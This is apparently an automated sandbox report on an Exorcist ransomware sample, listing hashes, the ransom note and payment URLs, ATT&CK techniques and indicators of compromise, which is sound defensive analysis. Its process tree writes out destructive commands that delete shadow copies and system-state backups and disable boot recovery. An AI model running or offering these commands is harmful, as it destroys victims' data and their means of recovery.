exorcist | d7d0688022b5848caf5cbabc1bde628cb74f32e014311f5299ed63241fff72b0

Resubmissions

23-09-2020 10:35

200923-mkwlt9yalx 10

23-07-2020 14:59

200723-mtbw6t99d2 10

23-07-2020 13:47

200723-5t3mhtw95x 10

Analysis

max time kernel
146s
max time network
151s
platform
windows7_x64
resource
win7v200722
submitted
23-09-2020 10:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

build-x64-crypt.bin.exe
Size

52KB
MD5

8cc13fea61cc0ba1382a779ee46726f0
SHA1

bd8ef46a02085153605a87fcc047f7ef3d0c4131
SHA256

eeb8a83d7532797d39d060ffb2a65562e8d803c4dbd8379289f99367cac2f850
SHA512

2f317f04b6bda9af58b049cb9bd0032d08c0aa30b8ac8d76b10f738ab11f4cc9f4eca4af3ecf26e610715117e2d68e5f8fb0ac139e60e882cc24fc795bf0a34a

Score

10^/10

ransomware evasion persistence exorcist

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\Ejdgcj-decrypt.hta

Family

exorcist

Ransom Note

Ejdgcj Decrypt All your data has been encrypted with Exorcist Ransomware. Do not worry: you have some hours to contact us and decrypt your data by paying a ransom. To do this, follow instructions on this web site: http://217.8.117.26/pay Also, you can install Tor Browser and use this web site: http://4dnd3utjsmm2zcsb.onion/pay IMPORTANT: Do not modify this file, otherwise you will not be able to recover your data! Your authorization key: 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

URLs

http://217.8.117.26/pay

http://4dnd3utjsmm2zcsb.onion/pay

Signatures

Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
ransomware exorcist
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

360 bcdedit.exe
912 bcdedit.exe
Deletes System State backups 3 TTPs 2 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exe

pid process

1780 wbadmin.exe
316 wbadmin.exe

pid	process
360	bcdedit.exe
912	bcdedit.exe

pid	process
1780	wbadmin.exe
316	wbadmin.exe

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

build-x64-crypt.bin.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\JoinDebug.crw => C:\Users\Admin\Pictures\JoinDebug.crw.Ejdgcj	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\JoinDebug.crw.Ejdgcj	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\LockBackup.raw => C:\Users\Admin\Pictures\LockBackup.raw.Ejdgcj	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\LockBackup.raw.Ejdgcj	build-x64-crypt.bin.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

build-x64-crypt.bin.exe

description	ioc	process
File opened (read-only)	\??\O:	build-x64-crypt.bin.exe
File opened (read-only)	\??\P:	build-x64-crypt.bin.exe
File opened (read-only)	\??\A:	build-x64-crypt.bin.exe
File opened (read-only)	\??\B:	build-x64-crypt.bin.exe
File opened (read-only)	\??\I:	build-x64-crypt.bin.exe
File opened (read-only)	\??\K:	build-x64-crypt.bin.exe
File opened (read-only)	\??\V:	build-x64-crypt.bin.exe
File opened (read-only)	\??\F:	build-x64-crypt.bin.exe
File opened (read-only)	\??\L:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Q:	build-x64-crypt.bin.exe
File opened (read-only)	\??\S:	build-x64-crypt.bin.exe
File opened (read-only)	\??\J:	build-x64-crypt.bin.exe
File opened (read-only)	\??\M:	build-x64-crypt.bin.exe
File opened (read-only)	\??\R:	build-x64-crypt.bin.exe
File opened (read-only)	\??\T:	build-x64-crypt.bin.exe
File opened (read-only)	\??\U:	build-x64-crypt.bin.exe
File opened (read-only)	\??\W:	build-x64-crypt.bin.exe
File opened (read-only)	\??\X:	build-x64-crypt.bin.exe
File opened (read-only)	\??\E:	build-x64-crypt.bin.exe
File opened (read-only)	\??\G:	build-x64-crypt.bin.exe
File opened (read-only)	\??\H:	build-x64-crypt.bin.exe
File opened (read-only)	\??\N:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Y:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Z:	build-x64-crypt.bin.exe

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe

Drops file in Windows directory 6 IoCs

Processes:

wbadmin.exewbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1408 vssadmin.exe

pid	process
1408	vssadmin.exe

Kills process with taskkill 91 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
228	taskkill.exe
552	taskkill.exe
968	taskkill.exe
1140	taskkill.exe
340	taskkill.exe
220	taskkill.exe
1708	taskkill.exe
2016	taskkill.exe
1252	taskkill.exe
1544	taskkill.exe
316	taskkill.exe
1736	taskkill.exe
588	taskkill.exe
224	taskkill.exe
1456	taskkill.exe
1040	taskkill.exe
1100	taskkill.exe
804	taskkill.exe
1848	taskkill.exe
2036	taskkill.exe
1300	taskkill.exe
1756	taskkill.exe
1756	taskkill.exe
1144	taskkill.exe
1336	taskkill.exe
968	taskkill.exe
1936	taskkill.exe
1780	taskkill.exe
2008	taskkill.exe
684	taskkill.exe
1548	taskkill.exe
684	taskkill.exe
2008	taskkill.exe
1488	taskkill.exe
956	taskkill.exe
1972	taskkill.exe
1144	taskkill.exe
1952	taskkill.exe
1836	taskkill.exe
1792	taskkill.exe
1760	taskkill.exe
900	taskkill.exe
1952	taskkill.exe
1500	taskkill.exe
1064	taskkill.exe
1524	taskkill.exe
1736	taskkill.exe
236	taskkill.exe
1556	taskkill.exe
1996	taskkill.exe
1524	taskkill.exe
480	taskkill.exe
1936	taskkill.exe
924	taskkill.exe
316	taskkill.exe
1556	taskkill.exe
1836	taskkill.exe
1336	taskkill.exe
848	taskkill.exe
936	taskkill.exe
956	taskkill.exe
2036	taskkill.exe
848	taskkill.exe
2016	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

NTFS ADS 5 IoCs

Processes:

build-x64-crypt.bin.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:ivrhwmenumbuocvak	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:tpupnbvzicwro	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:iykxevszimranzpu	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd	build-x64-crypt.bin.exe

Suspicious behavior: EnumeratesProcesses 344 IoCs

Processes:

build-x64-crypt.bin.exe

pid	process
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe
1000	build-x64-crypt.bin.exe

Suspicious use of AdjustPrivilegeToken 135 IoCs

Processes:

WMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1760	WMIC.exe
Token: SeSecurityPrivilege	1760	WMIC.exe
Token: SeTakeOwnershipPrivilege	1760	WMIC.exe
Token: SeLoadDriverPrivilege	1760	WMIC.exe
Token: SeSystemProfilePrivilege	1760	WMIC.exe
Token: SeSystemtimePrivilege	1760	WMIC.exe
Token: SeProfSingleProcessPrivilege	1760	WMIC.exe
Token: SeIncBasePriorityPrivilege	1760	WMIC.exe
Token: SeCreatePagefilePrivilege	1760	WMIC.exe
Token: SeBackupPrivilege	1760	WMIC.exe
Token: SeRestorePrivilege	1760	WMIC.exe
Token: SeShutdownPrivilege	1760	WMIC.exe
Token: SeDebugPrivilege	1760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1760	WMIC.exe
Token: SeRemoteShutdownPrivilege	1760	WMIC.exe
Token: SeUndockPrivilege	1760	WMIC.exe
Token: SeManageVolumePrivilege	1760	WMIC.exe
Token: 33	1760	WMIC.exe
Token: 34	1760	WMIC.exe
Token: 35	1760	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1760	WMIC.exe
Token: SeSecurityPrivilege	1760	WMIC.exe
Token: SeTakeOwnershipPrivilege	1760	WMIC.exe
Token: SeLoadDriverPrivilege	1760	WMIC.exe
Token: SeSystemProfilePrivilege	1760	WMIC.exe
Token: SeSystemtimePrivilege	1760	WMIC.exe
Token: SeProfSingleProcessPrivilege	1760	WMIC.exe
Token: SeIncBasePriorityPrivilege	1760	WMIC.exe
Token: SeCreatePagefilePrivilege	1760	WMIC.exe
Token: SeBackupPrivilege	1760	WMIC.exe
Token: SeRestorePrivilege	1760	WMIC.exe
Token: SeShutdownPrivilege	1760	WMIC.exe
Token: SeDebugPrivilege	1760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1760	WMIC.exe
Token: SeRemoteShutdownPrivilege	1760	WMIC.exe
Token: SeUndockPrivilege	1760	WMIC.exe
Token: SeManageVolumePrivilege	1760	WMIC.exe
Token: 33	1760	WMIC.exe
Token: 34	1760	WMIC.exe
Token: 35	1760	WMIC.exe
Token: SeBackupPrivilege	1512	vssvc.exe
Token: SeRestorePrivilege	1512	vssvc.exe
Token: SeAuditPrivilege	1512	vssvc.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	224	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	544	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	232	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	1140	taskkill.exe
Token: SeDebugPrivilege	360	taskkill.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	1488	taskkill.exe
Token: SeDebugPrivilege	1080	taskkill.exe
Token: SeDebugPrivilege	1848	taskkill.exe
Token: SeDebugPrivilege	1456	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	2044	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	1040	taskkill.exe

Suspicious use of WriteProcessMemory 588 IoCs

Processes:

build-x64-crypt.bin.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1000 wrote to memory of 1304	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 1304	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 1304	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1304 wrote to memory of 1760	1304	cmd.exe	WMIC.exe
PID 1304 wrote to memory of 1760	1304	cmd.exe	WMIC.exe
PID 1304 wrote to memory of 1760	1304	cmd.exe	WMIC.exe
PID 1000 wrote to memory of 2000	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 2000	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 2000	1000	build-x64-crypt.bin.exe	cmd.exe
PID 2000 wrote to memory of 1780	2000	cmd.exe	wbadmin.exe
PID 2000 wrote to memory of 1780	2000	cmd.exe	wbadmin.exe
PID 2000 wrote to memory of 1780	2000	cmd.exe	wbadmin.exe
PID 1000 wrote to memory of 420	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 420	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 420	1000	build-x64-crypt.bin.exe	cmd.exe
PID 420 wrote to memory of 316	420	cmd.exe	wbadmin.exe
PID 420 wrote to memory of 316	420	cmd.exe	wbadmin.exe
PID 420 wrote to memory of 316	420	cmd.exe	wbadmin.exe
PID 1000 wrote to memory of 684	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 684	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 684	1000	build-x64-crypt.bin.exe	cmd.exe
PID 684 wrote to memory of 360	684	cmd.exe	bcdedit.exe
PID 684 wrote to memory of 360	684	cmd.exe	bcdedit.exe
PID 684 wrote to memory of 360	684	cmd.exe	bcdedit.exe
PID 1000 wrote to memory of 276	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 276	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 276	1000	build-x64-crypt.bin.exe	cmd.exe
PID 276 wrote to memory of 912	276	cmd.exe	bcdedit.exe
PID 276 wrote to memory of 912	276	cmd.exe	bcdedit.exe
PID 276 wrote to memory of 912	276	cmd.exe	bcdedit.exe
PID 1000 wrote to memory of 1776	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 1776	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 1776	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1776 wrote to memory of 1408	1776	cmd.exe	vssadmin.exe
PID 1776 wrote to memory of 1408	1776	cmd.exe	vssadmin.exe
PID 1776 wrote to memory of 1408	1776	cmd.exe	vssadmin.exe
PID 1000 wrote to memory of 372	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 372	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 372	1000	build-x64-crypt.bin.exe	cmd.exe
PID 372 wrote to memory of 1040	372	cmd.exe	VSSVC.exe
PID 372 wrote to memory of 1040	372	cmd.exe	VSSVC.exe
PID 372 wrote to memory of 1040	372	cmd.exe	VSSVC.exe
PID 1000 wrote to memory of 1740	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 1740	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 1740	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1740 wrote to memory of 1972	1740	cmd.exe	taskkill.exe
PID 1740 wrote to memory of 1972	1740	cmd.exe	taskkill.exe
PID 1740 wrote to memory of 1972	1740	cmd.exe	taskkill.exe
PID 1000 wrote to memory of 2024	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 2024	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 2024	1000	build-x64-crypt.bin.exe	cmd.exe
PID 2024 wrote to memory of 224	2024	cmd.exe	taskkill.exe
PID 2024 wrote to memory of 224	2024	cmd.exe	taskkill.exe
PID 2024 wrote to memory of 224	2024	cmd.exe	taskkill.exe
PID 1000 wrote to memory of 1828	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 1828	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 1828	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1828 wrote to memory of 1736	1828	cmd.exe	taskkill.exe
PID 1828 wrote to memory of 1736	1828	cmd.exe	taskkill.exe
PID 1828 wrote to memory of 1736	1828	cmd.exe	taskkill.exe
PID 1000 wrote to memory of 920	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 920	1000	build-x64-crypt.bin.exe	cmd.exe
PID 1000 wrote to memory of 920	1000	build-x64-crypt.bin.exe	cmd.exe
PID 920 wrote to memory of 544	920	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe
"C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1000

C:\Windows\system32\cmd.exe
cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive
2⤵
- Suspicious use of WriteProcessMemory
PID:1304

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe SHADOWCOPY DELETE /nointeractive
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\system32\cmd.exe
cmd /C wbadmin DELETE SYSTEMSTATEBACKUP
2⤵
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
3⤵
- Deletes System State backups
- Drops file in Windows directory
PID:1780

C:\Windows\system32\cmd.exe
cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
2⤵
- Suspicious use of WriteProcessMemory
PID:420

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
3⤵
- Deletes System State backups
- Drops file in Windows directory
PID:316

C:\Windows\system32\cmd.exe
cmd /C bcdedit.exe /set {default} recoveryenabled No
2⤵
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
3⤵
- Modifies boot configuration data using bcdedit
PID:360

